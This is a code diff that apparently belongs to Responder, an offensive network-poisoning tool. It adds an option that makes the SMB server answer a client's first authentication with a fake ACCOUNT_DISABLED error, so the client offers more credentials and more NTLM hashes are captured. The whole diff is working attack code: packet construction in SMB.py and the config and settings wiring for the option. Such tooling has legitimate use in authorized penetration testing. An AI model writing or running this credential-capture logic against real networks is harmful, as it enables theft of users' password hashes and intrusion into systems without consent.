diff --git a/Responder.conf b/Responder.conf index dc86a48..4303df6 100644 --- a/Responder.conf +++ b/Responder.conf @@ -49,6 +49,11 @@ DontRespondToName = ; if a hash hash been previously captured for this host. AutoIgnoreAfterSuccess = Off +; If set to On, we will send ACCOUNT_DISABLED when the client tries +; to authenticate for the first time to try to get different credentials. +; This may break file serving and is useful only for hash capture +CaptureMultipleCredentials = Off + [HTTP Server] ; Set to On to always serve the custom EXE diff --git a/servers/SMB.py b/servers/SMB.py index 6127eca..0f89553 100644 --- a/servers/SMB.py +++ b/servers/SMB.py @@ -182,6 +182,7 @@ def IsNT4ClearTxt(data, client): class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP def handle(self): try: + self.ntry = 0 while True: data = self.request.recv(1024) self.request.settimeout(1) @@ -213,7 +214,10 @@ class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP # STATUS_MORE_PROCESSING_REQUIRED Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data)) - Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge) + if settings.Config.CaptureMultipleCredentials and self.ntry == 0: + Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH") + else: + Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge) Body.calculate() Packet = str(Header)+str(Body) @@ -237,6 +241,18 @@ class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP # Parse NTLMSSP_AUTH packet ParseSMBHash(data,self.client_address[0]) + if settings.Config.CaptureMultipleCredentials and self.ntry == 0: + # Send ACCOUNT_DISABLED to get multiple hashes if there are any + Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. + Body = SMBSessEmpty() + + Packet = str(Header)+str(Body) + Buffer = struct.pack(">i", len(''.join(Packet)))+Packet + + self.request.send(Buffer) + self.ntry += 1 + continue + # Send STATUS_SUCCESS Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data)) Body = SMBSession2Accept() @@ -341,4 +357,4 @@ class SMB1LM(BaseRequestHandler): # SMB Server class, old version data = self.request.recv(1024) except Exception: self.request.close() - pass \ No newline at end of file + pass diff --git a/settings.py b/settings.py index b894dab..444a4fd 100644 --- a/settings.py +++ b/settings.py @@ -146,8 +146,9 @@ class Settings: self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]) # Auto Ignore List - self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess')) - self.AutoIgnoreList = [] + self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess')) + self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials')) + self.AutoIgnoreList = [] # CLI options self.LM_On_Off = options.LM_On_Off